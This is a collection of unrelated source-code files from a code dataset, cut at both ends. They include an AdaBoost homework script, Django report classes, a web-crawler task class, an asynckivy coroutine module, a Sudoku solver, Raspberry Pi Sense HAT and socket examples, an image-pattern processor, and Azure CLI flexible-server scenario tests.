bootstrapSize/2 :\n\t\t\t\tpredict.append(1)\n\t\t\telse :\n\t\t\t\tpredict.append(0)\n\t\t#calc the correct ratio\n\t\tcorrectRatio = 0.0\n\t\tfor i in range( len(y_test) ) :\n\t\t\tif y_test[i] == predict[i] :\n\t\t\t\tcorrectRatio += 1\n\t\tcorrectRatio = correctRatio / len(X_test)\n\t\tprint(correctRatio)\n\n\tif task == 3 or task == 4 or task == 6: #3AdaBoost + SVM #4AdaBoost + DTree\n\t\tbootstrapSize = 100\n\t\tresult = []\n\t\tpredict = []\n\t\tweight = [1.0/len(X_train) for x in X_train]\n\t\tbeta = [0.0 for x in range(bootstrapSize)]\n\n\t\t#start single training\n\t\tfor i in range(bootstrapSize) :\n\t\t\t#set classifier\n\t\t\tif task == 3:\n\t\t\t\tclf = svm.LinearSVC(dual=False)\n\t\t\tif task == 4:\n\t\t\t\tclf = tree.DecisionTreeClassifier()\n\t\t\tif task == 6:\n\t\t\t\tclf = GaussianNB()\n\t\t\t\tweight = numpy.array(weight)\n\t\t\tclf.fit(X_train , y_train , sample_weight = weight)\n\t\t\t#predict the training set\n\t\t\tresult_temp = clf.predict(X_train)\n\t\t\t#update beta\n\t\t\terrorWeight = sum( [0.0 if result_temp[j]==y_train[j] else weight[j] for j in range( len(X_train) ) ] ) \n\t\t\tbeta[i] = errorWeight / (1 - errorWeight)\n\t\t\t#update weight\n\t\t\tweight = [ weight[j]*beta[i] if result_temp[j]==y_train[j] else weight[j] for j in range( len(X_train) ) ] \n\t\t\tweightSum = sum(weight)\n\t\t\tweight = [ weight[j]/weightSum for j in range( len(X_train) ) ]\n\t\t\t#predict the test set by single training\n\t\t\tresult_temp = clf.predict(X_test)\n\t\t\tresult.append([math.log(1/beta[i]) if x == 1 else -math.log(1/beta[i]) for x in result_temp])\n\n\t\t#predict by Adaboost\n\t\tfor i in range(len(y_test)):\n\t\t\tcount = 0.0\n\t\t\tfor j in range(bootstrapSize):\n\t\t\t\tcount += result[j][i]\n\t\t\tif count > 0 :\n\t\t\t\tpredict.append(1)\n\t\t\telse :\n\t\t\t\tpredict.append(0)\n\t\t#calc the correct ratio\n\t\tcorrectRatio = 0.0\n\t\tfor i in range( len(y_test) ) :\n\t\t\tif y_test[i] == predict[i] :\n\t\t\t\tcorrectRatio += 1\n\t\tcorrectRatio = correctRatio / len(X_test)\n\t\tprint(correctRatio)\n\nfor i in range(1,7):\n\tmain(i)\n","sub_path":"复试/人工智能/机器学习概论/hw/2017实验/exp2/实验二/2014011328/exp2.py","file_name":"exp2.py","file_ext":"py","file_size_in_byte":4350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"447882909","text":"from django.urls import reverse\n\nfrom custom.icds import icds_toggles\nfrom corehq.apps.locations.permissions import location_safe\nfrom corehq.apps.reports.filters.select import YearFilter\nfrom corehq.apps.reports.standard import CustomProjectReport\nfrom custom.icds_reports.asr_sqldata import ASRIdentification, ASROperationalization, ASRPopulation, Annual, \\\n DisabledChildren, Infrastructure, Equipment\nfrom custom.icds_reports.filters import ICDSMonthFilter, IcdsLocationFilter, IcdsASRLocationFilter\nfrom custom.icds_reports.mpr_sqldata import MPRIdentification, MPRSectors, MPRPopulation, MPRBirthsAndDeaths, \\\n MPRAWCDetails, MPRSupplementaryNutrition, MPRUsingSalt, MPRProgrammeCoverage, MPRPreschoolEducation, \\\n MPRGrowthMonitoring, MPRImmunizationCoverage, MPRVhnd, MPRReferralServices, MPRMonitoring, \\\n MPROperationalizationBeta, MPRPopulationBeta, MPRGrowthMonitoringBeta, MPRSupplementaryNutritionBeta, \\\n MPRMonitoringBeta, MPRVhndBeta, MPRUsingSaltBeta, MPRImmunizationCoverageBeta, MPRPreschoolEducationBeta, \\\n MPRProgrammeCoverageBeta, MPRAWCDetailsBeta, MPRReferralServicesBeta, MPRBirthsAndDeathsBeta\n\nfrom custom.icds_reports.mpr_sqldata import MPROperationalization\nfrom custom.icds_reports.reports import IcdsBaseReport\n\n\n@location_safe\nclass MPRReport(IcdsBaseReport):\n\n title = 'Monthly Progress Report (MPR)'\n slug = 'mpr_report'\n name = 'MPR'\n\n fields = [IcdsLocationFilter, ICDSMonthFilter, YearFilter]\n\n @property\n def data_provider_classes(self):\n return [\n MPRIdentification,\n MPROperationalization if not self.icds_pre_release_features() else MPROperationalizationBeta,\n MPRSectors,\n MPRPopulation if not self.icds_pre_release_features() else MPRPopulationBeta,\n MPRBirthsAndDeaths if not self.icds_pre_release_features() else MPRBirthsAndDeathsBeta,\n MPRAWCDetails if not self.icds_pre_release_features() else MPRAWCDetailsBeta,\n MPRSupplementaryNutrition if not self.icds_pre_release_features() else MPRSupplementaryNutritionBeta,\n MPRUsingSalt if not self.icds_pre_release_features() else MPRUsingSaltBeta,\n MPRProgrammeCoverage if not self.icds_pre_release_features() else MPRProgrammeCoverageBeta,\n MPRPreschoolEducation if not self.icds_pre_release_features() else MPRPreschoolEducationBeta,\n MPRGrowthMonitoring if not self.icds_pre_release_features() else MPRGrowthMonitoringBeta,\n MPRImmunizationCoverage if not self.icds_pre_release_features() else MPRImmunizationCoverageBeta,\n MPRVhnd if not self.icds_pre_release_features() else MPRVhndBeta,\n MPRReferralServices if not self.icds_pre_release_features() else MPRReferralServicesBeta,\n MPRMonitoring if not self.icds_pre_release_features() else MPRMonitoringBeta\n ]\n\n\n@location_safe\nclass ASRReport(IcdsBaseReport):\n\n title = 'Annual Status Report (ASR)'\n slug = 'asr_report'\n name = 'ASR'\n\n fields = [IcdsASRLocationFilter]\n\n @property\n def data_provider_classes(self):\n cls_list = [\n ASRIdentification,\n ASROperationalization,\n ASRPopulation,\n Annual,\n DisabledChildren,\n Infrastructure,\n Equipment\n ]\n return cls_list\n\n\n@location_safe\nclass DashboardReport(CustomProjectReport):\n slug = 'dashboard_report'\n name = 'Dashboard ICDS-CAS'\n\n @classmethod\n def get_url(cls, domain=None, **kwargs):\n return reverse('icds_dashboard', args=[domain])\n\n @classmethod\n def show_in_navigation(cls, domain=None, project=None, user=None):\n return icds_toggles.DASHBOARD_ICDS_REPORT.enabled(domain)\n","sub_path":"custom/icds_reports/reports/reports.py","file_name":"reports.py","file_ext":"py","file_size_in_byte":3743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"252196373","text":"\n'''\nCopyright (c)2008-2009 Serendio Software Private Limited\nAll Rights Reserved\n\nThis software is confidential and proprietary information of Serendio Software. It is disclosed pursuant to a non-disclosure agreement between the recipient and Serendio. This source code is provided for informational purposes only, and Serendio makes no warranties, either express or implied, in this. Information in this program, including URL and other Internet website references, is subject to change without notice. The entire risk of the use or the results of the use of this program remains with the user. Complying with all applicable copyright laws is the responsibility of the user. Without limiting the rights under copyright, no part of this program may be reproduced, stored in, or introduced into a retrieval system, or distributed or transmitted in any form or by any means (electronic, mechanical, photocopying, recording, on a website, or otherwise) or for any purpose, without the express written permission of Serendio Software.\n\nSerendio may have patents, patent applications, trademarks, copyrights, or other intellectual property rights covering subject matter in this program. Except as expressly provided in any written license agreement from Serendio, the furnishing of this program does not give you any license to these patents, trademarks, copyrights, or other intellectual property.\n'''\n\nfrom sessioninfo import SessionInfo\n\nclass Task(object):\n def __init__(self, instance_data, connector_instance_log_id,\n workspace_id, client_id, client_name, connector_instance_id,\n dburi, priority = 10, keywords = None, level = 1,\n highlight_words=None, token = (), times_reenqueued=0):\n\n ##minimum requirements begin##\n\n ##for sending a task, getting linksout, getting dbentry for a task\n self.connClass = None\n self.instance_data = instance_data\n self.token = token\n self.times_reenqueued = times_reenqueued\n\n #this will set the meta page level to 0,\n #thus increment/decrement is done at this one place and done with\n self.level=level\n# if self.instance_data.get('metapage'):\n# self.level= self.level - 1 \n\n self.session_info=SessionInfo()\n\n self.keywords = []\n if keywords:\n self.keywords=keywords\n self.highlight_words = []\n if highlight_words:\n self.highlight_words = highlight_words\n #maintained by linkouts, saved in Solr,\n self.priority = priority\n self.connector_instance_log_id = connector_instance_log_id\n\n #to be put in Solr\n self.client_id = client_id\n self.client_name=client_name\n self.workspace_id = workspace_id\n self.connector_instance_id = connector_instance_id\n self.dburi = dburi\n ##minimum requirements end##\n\n\n ##extras\n self.start_time=None\n self.end_time=None\n\n #the status'es of the four phases\n self.status = {}\n self.status['fetch_status'] = False\n self.status['fetch_message'] = ''\n self.status['filter_status'] = False\n self.status['extract_status'] = False\n\n self.pagedata = {}\n #used to set the title for a followed link\n #after following heuristics like length and same title\n self.pagedata['title'] = ''\n #used to set the created_date for 1. current article(now) and 2. A followed link(from link)\n # self.pagedata['posted_date'] = datetime.utcnow()#.utctimetuple()\n# #utcnow always - override\n# self.pagedata['pickup_date'] = datetime.utcnow()#.utctimetuple()\n# #store current page's hash\n# self.pagedata['content_hash'] = ''\n# #needed 1. when updated content found, retrieved from solr using the url\n# #and sent back for making the parent child relation 2. None default\n self.pagedata['parent_task_id'] = None #This data is stored in saveToDB\n# # using jsontext for storing the related uris\n# self.pagedata['related_uris']= []\n# #number of posts from a review or forum\n# self.pagedata['num_posts']=None\n \n\n def clone(self):\n '''\n Create a new task from the current task. Increment the level and\n set appropiate values for other elements\n '''\n #level+1 not always true - metapage\n if self.instance_data.get('metapage'):\n level = self.level\n else:\n level = self.level + 1\n t = Task(instance_data=self.instance_data.copy(), #session_info=self.session_info.copy(),\n connector_instance_log_id=self.connector_instance_log_id, workspace_id=self.workspace_id,\n client_id=self.client_id, client_name=self.client_name, \n connector_instance_id=self.connector_instance_id,dburi=self.dburi,\n priority=self.priority, keywords=self.keywords, level=level,\n highlight_words=self.highlight_words,token=self.token,\n times_reenqueued = self.times_reenqueued)\n\n # Other than original pages, others cannot be meta pages.\n t.instance_data['metapage'] = False\n t.instance_data['already_parsed'] = True # so that pages from metapage is not pickedup by googlesiteconnector\n return t\n\n \n def __repr__(self):\n res=str(self.instance_data)+\" : \"+\\\n str(self.priority)+\" : \"+str(self.level)\n return res\n\n\ndef getDummyTask():\n return Task(instance_data={'uri':'http://news.google.co.in',\n 'queryterm':u'motorola and rfid',\n 'metapage':False,\n 'category':u'News',\n 'versioned':False,\n 'apply_keywords':False\n },\n connector_instance_log_id=1,\n workspace_id=1,\n client_id=1,\n client_name='dummy',\n connector_instance_id=1,\n dburi=None\n )\n","sub_path":"crawler/utils/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":6141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"602348109","text":"'''Everything in this module doesn't depend on Kivy.'''\n\n__all__ = ('start', 'or_', 'and_', 'Event', )\n\nimport types\nimport typing\nfrom inspect import getcoroutinestate, CORO_CLOSED\n\n\ndef start(coro):\n '''Starts a asynckivy-flavored coroutine.\n Returns the argument itself.\n '''\n def step_coro(*args, **kwargs):\n try:\n if getcoroutinestate(coro) != CORO_CLOSED:\n coro.send((args, kwargs, ))(step_coro)\n except StopIteration:\n pass\n\n try:\n coro.send(None)(step_coro)\n except StopIteration:\n pass\n\n return coro\n\n\nclass Task:\n '''(internal)'''\n __slots__ = ('coro', 'done', 'result', 'done_callback')\n def __init__(self, coro, *, done_callback=None):\n self.coro = coro\n self.done = False\n self.result = None\n self.done_callback = done_callback\n async def _run(self):\n self.result = await self.coro\n self.done = True\n if self.done_callback is not None:\n self.done_callback()\n\n\n@types.coroutine\ndef gather(coros:typing.Iterable[typing.Coroutine], *, n:int=None) -> typing.Sequence[Task]:\n '''(internal)'''\n coros = tuple(coros)\n n_coros_left = n if n is not None else len(coros)\n\n def step_coro(*args, **kwargs):\n nonlocal n_coros_left; n_coros_left -= 1\n def done_callback():\n nonlocal n_coros_left\n n_coros_left -= 1\n if n_coros_left == 0:\n step_coro()\n tasks = tuple(Task(coro, done_callback=done_callback) for coro in coros)\n for task in tasks:\n start(task._run())\n\n if n_coros_left <= 0:\n return tasks\n\n def callback(step_coro_):\n nonlocal step_coro\n step_coro = step_coro_\n yield callback\n\n return tasks\n\n\nasync def or_(*coros):\n return await gather(coros, n=1)\n\n\nasync def and_(*coros):\n return await gather(coros)\n\n\nclass Event:\n '''Equivalent of 'trio.Event'\n '''\n __slots__ = ('_flag', '_step_coro_list')\n\n def __init__(self):\n self._flag = False\n self._step_coro_list = []\n\n def is_set(self):\n return self._flag\n\n def set(self):\n if self._flag:\n return\n self._flag = True\n step_coro_list = self._step_coro_list\n self._step_coro_list = []\n for step_coro in step_coro_list:\n step_coro()\n\n def clear(self):\n self._flag = False\n\n @types.coroutine\n def wait(self):\n yield (lambda step_coro: step_coro()) if self._flag \\\n else self._step_coro_list.append\n\n\n@types.coroutine\ndef _get_step_coro():\n '''(internal)'''\n return (yield lambda step_coro: step_coro(step_coro))[0][0]\n","sub_path":".buildozer/android/platform/build-armeabi-v7a/build/python-installs/Arhat/asynckivy/_core.py","file_name":"_core.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"301106895","text":"\"\"\"\nsudoku.py\n\nA program that solves a Sudoku puzzle.\n\nauthor: Wiley Matthews\n\"\"\"\nimport argparse\nimport sys\nimport os\nfrom typing import List\n\nfrom model import Model, print_board\nfrom view import View\nfrom controller import Controller\n\n\ndef check_file(filename: str) -> None:\n \"\"\"\n Checks that the specified file exists. If not, prints to error output then closes the program.\n :param filename: name of the file in question.\n :return: None\n \"\"\"\n if not os.path.exists(filename): # Check that data file exists\n sys.stderr.write(\"Error: \" + filename + \" does not exist!\")\n exit()\n\n\ndef get_args() -> argparse.Namespace:\n \"\"\"\n Defines and parses the program arguments.\n :return: a namespace containing the args.\n \"\"\"\n parser = argparse.ArgumentParser(description=\"Solves a Sudoku puzzle using backtracking and displays the solution.\")\n\n parser.add_argument('filename', help=\"board file\")\n parser.add_argument('-d', '--display', action='store_true',\n help='display the backtracking process')\n parser.add_argument('-s', '--save', action='store', help='save the resulting solution to the specified file')\n\n return parser.parse_args()\n\n\ndef read_board_file(filename: str) -> List[List[str]]:\n \"\"\"\n Read a board file.\n :param filename: filename/directory of Sudoku board file.\n :return: nested lists representing the puzzle.\n \"\"\"\n board = []\n with open(filename, 'r') as f:\n for line in f.readlines():\n board.append(line[:-1].split(' ')) # line[:-1] to cut off newline char.\n return board\n\n\ndef write_board_file(board: List[List[str]], filename: str) -> None:\n \"\"\"\n Takes a Sudoku puzzle as nested lists and writes them to the specified file.\n :param board: nested lists representing the puzzle.\n :param filename: filename/directory of Sudoku board file.\n :return: None\n \"\"\"\n with open(filename, 'w') as f:\n for row in board:\n f.write(' '.join(row) + '\\n') # newline denotes row endings.\n\n\ndef main() -> None:\n \"\"\"\n Parses program arguments solves the specified Sudoku puzzle, and prints the solution to standard output. Then saves\n and/or displays the solution as specified in the program arguments.\n :return: None\n \"\"\"\n args = get_args()\n check_file(args.filename)\n board = read_board_file(args.filename)\n board_copy = [row[::1] for row in board] # To save original board state if display is needed.\n model = Model(board)\n controller = Controller(model)\n controller.solveSudoku(model)\n print_board(controller.model.board)\n if args.save:\n write_board_file(model.board, args.save)\n print(\"Solution saved to\", args.save)\n if args.display:\n view = View(board_copy)\n view.start()\n print(\"Display complete\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"sudoku/sudoku.py","file_name":"sudoku.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"279832864","text":"# LED laberinth\n\n# Libraries\nfrom sense_emu import SenseHat\nfrom time import sleep\n\n# Create an object\nsense = SenseHat()\nsense.clear()\n\n# Define colours\nred = (255, 0, 0)\nblue = (0, 0, 255)\ngreen = (0, 255, 0)\nwhite = (255, 255, 255)\nyellow = (255, 255, 0)\n\n# Display letter\nsense.show_letter(\"H\", text_colour=green)\nsleep(1)\n\n# Change background\nsense.show_letter(\"Z\", text_colour=blue,back_colour=red)","sub_path":"code/Session8_LED/exercise1b.py","file_name":"exercise1b.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"510433353","text":"import socket\nimport pickle\n\nconn = socket.socket()\nconn.connect(('localhost', 9090))\n\nobj = {\n 'a': int(input(\"основание а = \")),\n 'b': int(input(\"основание b = \")),\n 'h': int(input(\"высота h = \"))\n}\n\ndata = pickle.dumps(obj)\n\nconn.sendall(data)\n\nda = conn.recv(4096)\nmsg = da.decode()\nprint(\"Площадь трапеции равна: \" + msg)\n\nconn.close()\n\n","sub_path":"students/К33402/Surina_Liza/lab_works/lab_1/task_2/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"453983849","text":"'''\r\nauthor: Joshua Christian, r0b0ts.inc\r\ndate: Thur 7, june 2018, 5 Idowu Tailor, Victoria Island.\r\nproject: ADAM:The first\r\nfile: image_processor.py\r\n\r\n'''\r\n\r\nfrom functions import *\r\nfrom prime_number_generator import PrimeNumberGenerator\r\n\r\nimport time, random, math\r\ntry:\r\n\timport cv2\r\n\timport numpy as np\r\n\r\nexcept ImportError:\r\n\timport import_alternate\r\n\r\n_AGENT_VARS = readJsonFile('agent')\r\n##constants\r\n_AGENT_STATES = _AGENT_VARS[\"states\"]\r\n_AGENT_SENSORS = _AGENT_VARS[\"sensors\"]\r\n\r\nclass ImageProcessor:\r\n\r\n\t# to prevent from tranforming all the time\r\n\tpattern_map = {}\r\n\t\r\n\tmemory = {}\r\n\r\n # frequency of data\r\n\tfreq = {}\r\n\r\n\tdef __init__(self):\r\n\t\tself.PrimeNumberGenerator = PrimeNumberGenerator()\r\n\r\n\tdef findRelatedImages(self, img_id, include=False):\r\n\t\trel = {}\r\n\t\timage_model = self.memory[img_id]\r\n\t\tfor image_id in self.memory:\r\n\t\t\tif include == False and img_id == image_id:\r\n\t\t\t\tcontinue\r\n\r\n\t\t\trelation = self.getRelation(image_model, self.memory[image_id])\r\n\r\n\t\t\tif image_id not in rel:\r\n\t\t\t\trel[image_id] = 0\r\n\r\n\t\t\trel[image_id] = relation\r\n\r\n\t\tmean_rel = self.mean(rel)\r\n\t\trel = {x:rel[x] for x in rel if rel[x] >= mean_rel}\r\n\t\t\r\n\t\tfor x in rel:\r\n\t\t\tprint(\"related images\", x, rel[x])\r\n\r\n\t\treturn rel\r\n\r\n\tdef getPixelPositionRelation(self, pixel_positions1, pixel_positions2):\r\n\t\tratios = []\r\n\t\tfor i, pp in enumerate(pixel_positions2):\r\n\t\t\tif i >= len(pixel_positions1):\r\n\t\t\t\tratio = 0\r\n\r\n\t\t\telse:\r\n\t\t\t\tppx = pixel_positions1[i]\r\n\t\t\t\tif pp == ppx:\r\n\t\t\t\t\tratio = 1\r\n\r\n\t\t\t\telif pp > ppx:\r\n\t\t\t\t\tratio = float(ppx) / float(pp)\r\n\r\n\t\t\t\telse:\r\n\t\t\t\t\tratio = float(pp) / float(ppx)\r\n\t\t\tratios.append(ratio)\r\n\r\n\t\tratio = self.mean(ratios)\r\n\r\n\t\treturn ratio\r\n\r\n\tdef getPixelRelation(self, pixel1, pixel2):\r\n\t\tii = 0 #initail\r\n\t\tr_d = []\r\n\t\tfor ij in range(1, 4, 1):\r\n\t\t\tend = ij*3\r\n\t\t\tval = pixel1[ii:end]\r\n\t\t\tx = pixel2[ii:end]\r\n\r\n\t\t\tvalue = int(val)\r\n\t\t\tx = int(x)\r\n\r\n\t\t\tif value == x:\r\n\t\t\t\tr_dx = 1\r\n\r\n\t\t\telif value > x:\r\n\t\t\t\tr_dx = x/value\r\n\r\n\t\t\telse:\r\n\t\t\t\tr_dx = value/x\r\n\t\t\t\r\n\t\t\tr_d.append(r_dx)\r\n\t\t\tii = end\r\n\r\n\t\t# print(r_d)\r\n\t\tr_d = sum(r_d)/len(r_d)\r\n\t\treturn round(r_d, 4)\r\n\r\n\tdef getRelation(self, image_model1, image_model2):\r\n\t\tratios = []\r\n\t\trelated = []\r\n\t\tfor pixel1 in image_model1:\r\n\t\t\trelations = []\r\n\t\t\tpairs = []\r\n\r\n\t\t\tpixel1_construct = image_model1[pixel1]\r\n\t\t\tfor pixel2 in image_model2:\r\n\t\t\t\tpixel2_construct = image_model2[pixel2]\r\n\r\n\t\t\t\tpixel_relation = self.getPixelRelation(pixel1, pixel2)\r\n\t\t\t\tpixel_position_relation = self.getPixelPositionRelation(pixel1_construct, pixel2_construct)\r\n\t\t\t\t\r\n\t\t\t\tratio = self.mean([pixel_relation, pixel_position_relation])\r\n\t\t\t\tpair = (pixel1, pixel2, pixel1_construct, pixel2_construct)\r\n\r\n\t\t\t\trelations.append(ratio)\r\n\t\t\t\tpairs.append(pair)\r\n\r\n\t\t\tratio = max(relations)\r\n\t\t\tmean_ratio = self.mean(relations)\r\n\t\t\t\r\n\t\t\trelated.append([pairs[i] for i, relation in enumerate(relations) if relation >= mean_ratio])\r\n\t\t\tratios.append(ratio)\r\n \r\n\t\treturn self.mean(ratios), related\r\n\r\n\tdef getDataModels(self, data):\r\n\t\t'''\r\n\t\ttells how the data is modeled or constructed\r\n\t\t'''\r\n\t\tdata_li = data.split(\" \")\r\n\t\telements = set(data_li)\r\n\t\tlength = len(data_li)\r\n\r\n\t\tpatterns = {}\r\n\t\tindexes = {}\r\n\t\tfirst = {}\r\n\t\tfor i, dx in enumerate(data_li):\r\n\t\t\tif dx not in indexes:\r\n\t\t\t\tindexes[dx] = []\r\n\t\t\t\tfirst[dx] = i\r\n\r\n\t\t\tval = i - first[dx]\r\n\t\t\tindexes[dx].append(val)\r\n\r\n\t\tfor element in elements:\r\n\t\t\tconstruct = tuple([format(index/length, '.4f') for index in indexes[element]])\r\n\t\t\tpatterns[element] = construct\r\n\r\n\t\treturn patterns\r\n\r\n\tdef mean(self, li):\r\n\t\tif len(li) == 0:\r\n\t\t\treturn 0\r\n\r\n\t\telse:\r\n\t\t\tif type(li) == dict:\r\n\t\t\t\tli = [x for x in li.values()]\r\n\r\n\t\t\treturn sum(li)/len(li)\r\n\t\t\t\r\n\tdef newImage(self, image):\r\n\t\treturn self.transform(image)\r\n\t\r\n\tdef process(self, images, memory_id, sense):\r\n\t\trelated_images = self.findRelatedImages(memory_id)\r\n\r\n\t\treturn related_images\r\n\r\n\tdef pixelToString(self, pixel):\r\n\t\treturn \"\".join(['%03d'%(x) for x in pixel])\r\n\r\n\tdef save2memory(self, image):\r\n\t\t'''\r\n\t\tsave the construct fromat of the image in memory\r\n\t\timage - current/ latest image\r\n\t\t'''\r\n\t\timage_model = self.getDataModels(image)\r\n\r\n\t\tpattern_ratios = {element: (int(element[0:3])+int(element[3:6])+int(element[6:9]))/(3*255) for element in image_model}\r\n\r\n\t\tmean_pattern_ratio = sum(pattern_ratios.values())/len(image_model)\r\n\r\n\t\timage_model = {element: image_model[element] for element in image_model if len(image_model[element]) > 1 and pattern_ratios[element] >= mean_pattern_ratio}\r\n\r\n\t\tkey = self.PrimeNumberGenerator.nextPrimeNumber()\r\n\t\tself.memory[key] = image_model\r\n\r\n\t\t# for a in image_model:\r\n\t\t# \tprint(a, image_model[a])\r\n\t\t\t\r\n\t\tself.freq[key] = 1\r\n\t\treturn key\r\n\r\n\tdef transform(self, image):\r\n\t\t'''\r\n\t\tconverts an image into string of unique ids\r\n\t\t'''\r\n\t\tif type(image) == type(None):\r\n\t\t\treturn 'ImageNull'\r\n\r\n\t\timg = image.copy()\r\n\t\timage_ = []\r\n\t\tlast_pixel = [000, 000, 000]\r\n\t\tfor i in range(len(image)):\r\n\t\t\tfor j in range(len(image[i])):\r\n\t\t\t\tpixel = image[i, j]\r\n\r\n\t\t\t\tdiff = np.array([abs(int(pixel[k]) - int(last_pixel[k])) for k in range(3)])\r\n\t\t\t\timg[i,j] = diff\r\n\t\t\t\tpattern = tuple(diff)\r\n\t\t\t\t# print(last_pixel, pixel, pattern, diff)\r\n\t\t\t\tif pattern not in self.pattern_map:\r\n\t\t\t\t\tself.pattern_map[pattern] = self.pixelToString(pattern)\r\n\r\n\t\t\t\tpattern_str = self.pattern_map[pattern]\r\n\t\t\t\t\r\n\t\t\t\timage_.append(pattern_str)\r\n\t\t\t\tlast_pixel = pixel.copy()\r\n\t\timage_ = ' '.join(image_)\r\n\t\t# cv2.imwrite('d.jpg', img)\r\n\t\t# input()\r\n\t\treturn image_\r\n","sub_path":"image_processor.py","file_name":"image_processor.py","file_ext":"py","file_size_in_byte":5488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"374337033","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\nimport time\n\nfrom datetime import datetime, timedelta, tzinfo\nfrom time import sleep\nfrom dateutil.tz import tzutc\nfrom azure_devtools.scenario_tests import AllowLargeResponse\nfrom msrestazure.azure_exceptions import CloudError\nfrom azure.cli.core.local_context import AzCLILocalContext, ALL, LOCAL_CONTEXT_FILE\nfrom azure.cli.core.util import CLIError\nfrom azure.cli.core.util import parse_proxy_resource_id\nfrom azure.cli.testsdk.base import execute\nfrom azure.cli.testsdk.exceptions import CliTestError\nfrom azure.cli.testsdk import (\n JMESPathCheck,\n NoneCheck,\n ResourceGroupPreparer,\n ScenarioTest,\n LocalContextScenarioTest,\n live_only)\nfrom azure.cli.testsdk.preparers import (\n AbstractPreparer,\n SingleValueReplacer)\n\n# Constants\nSERVER_NAME_PREFIX = 'azuredbclitest-'\nSERVER_NAME_MAX_LENGTH = 20\nGROUP_NAME_PREFIX = 'azuredbclitest-'\nGROUP_NAME_MAX_LENGTH = 20\n\n\nclass FlexibleServerMgmtScenarioTest(ScenarioTest):\n\n postgres_location = 'eastus'\n mysql_location = 'westus2'\n\n @AllowLargeResponse()\n @ResourceGroupPreparer(location=postgres_location)\n def test_postgres_flexible_server_mgmt(self, resource_group):\n self._test_flexible_server_mgmt('postgres', resource_group)\n\n @AllowLargeResponse()\n @ResourceGroupPreparer(location=mysql_location)\n def test_mysql_flexible_server_mgmt(self, resource_group):\n self._test_flexible_server_mgmt('mysql', resource_group)\n\n def _test_flexible_server_mgmt(self, database_engine, resource_group):\n\n # flexible-server create\n if self.cli_ctx.local_context.is_on:\n self.cmd('local-context off')\n\n if database_engine == 'postgres':\n tier = 'GeneralPurpose'\n sku_name = 'Standard_D2s_v3'\n version = '12'\n storage_size = 128\n location = self.postgres_location\n elif database_engine == 'mysql':\n tier = 'Burstable'\n sku_name = 'Standard_B1ms'\n storage_size = 10\n version = '5.7'\n location = self.mysql_location\n\n # flexible-server create with user input\n server_name = self.create_random_name(SERVER_NAME_PREFIX, SERVER_NAME_MAX_LENGTH)\n storage_size_mb = storage_size * 1024\n backup_retention = 7\n\n list_checks = [JMESPathCheck('name', server_name),\n JMESPathCheck('resourceGroup', resource_group),\n JMESPathCheck('sku.name', sku_name),\n JMESPathCheck('sku.tier', tier),\n JMESPathCheck('version', version),\n JMESPathCheck('storageProfile.storageMb', storage_size_mb),\n JMESPathCheck('storageProfile.backupRetentionDays', backup_retention)]\n\n self.cmd('{} flexible-server create -g {} -n {} -l {}'\n .format(database_engine, resource_group, server_name, location))\n current_time = datetime.utcnow()\n\n # flexible-server show\n self.cmd('{} flexible-server show -g {} -n {}'\n .format(database_engine, resource_group, server_name), checks=list_checks).get_output_in_json()\n\n # flexible-server update\n self.cmd('{} flexible-server update -g {} -n {} --storage-size 256'\n .format(database_engine, resource_group, server_name),\n checks=[JMESPathCheck('storageProfile.storageMb', 256 * 1024)])\n\n self.cmd('{} flexible-server update -g {} -n {} --backup-retention {}'\n .format(database_engine, resource_group, server_name, backup_retention + 10),\n checks=[JMESPathCheck('storageProfile.backupRetentionDays', backup_retention + 10)])\n\n if database_engine == 'postgres':\n tier = 'Burstable'\n sku_name = 'Standard_B1ms'\n elif database_engine == 'mysql':\n tier = 'GeneralPurpose'\n sku_name = 'Standard_D2ds_v4'\n self.cmd('{} flexible-server update -g {} -n {} --tier {} --sku-name {}'\n .format(database_engine, resource_group, server_name, tier, sku_name),\n checks=[JMESPathCheck('sku.tier', tier),\n JMESPathCheck('sku.name', sku_name)])\n\n if database_engine == 'postgres':\n self.cmd('{} flexible-server update -g {} -n {} --maintenance-window Mon:1:30'\n .format(database_engine, resource_group, server_name),\n checks=[JMESPathCheck('maintenanceWindow.dayOfWeek', 1),\n JMESPathCheck('maintenanceWindow.startHour', 1),\n JMESPathCheck('maintenanceWindow.startMinute', 30)])\n\n self.cmd('{} flexible-server update -g {} -n {} --tags key=3'\n .format(database_engine, resource_group, server_name),\n checks=[JMESPathCheck('tags.key', '3')])\n\n # flexible-server restore\n restore_server_name = 'restore-' + server_name\n restore_time = (current_time + timedelta(minutes=10)).replace(tzinfo=tzutc()).isoformat()\n self.cmd('{} flexible-server restore -g {} --name {} --source-server {} --time {}'\n .format(database_engine, resource_group, restore_server_name, server_name, restore_time),\n checks=[JMESPathCheck('name', restore_server_name),\n JMESPathCheck('resourceGroup', resource_group)])\n\n if database_engine == 'postgres':\n # flexible-server restart\n self.cmd('{} flexible-server restart -g {} -n {}'\n .format(database_engine, resource_group, server_name), checks=NoneCheck())\n\n # flexible-server stop\n self.cmd('{} flexible-server stop -g {} -n {}'\n .format(database_engine, resource_group, server_name), checks=NoneCheck())\n\n # flexible-server start\n self.cmd('{} flexible-server start -g {} -n {}'\n .format(database_engine, resource_group, server_name), checks=NoneCheck())\n\n # flexible-server list servers\n self.cmd('{} flexible-server list -g {}'.format(database_engine, resource_group),\n checks=[JMESPathCheck('type(@)', 'array')])\n\n # test delete 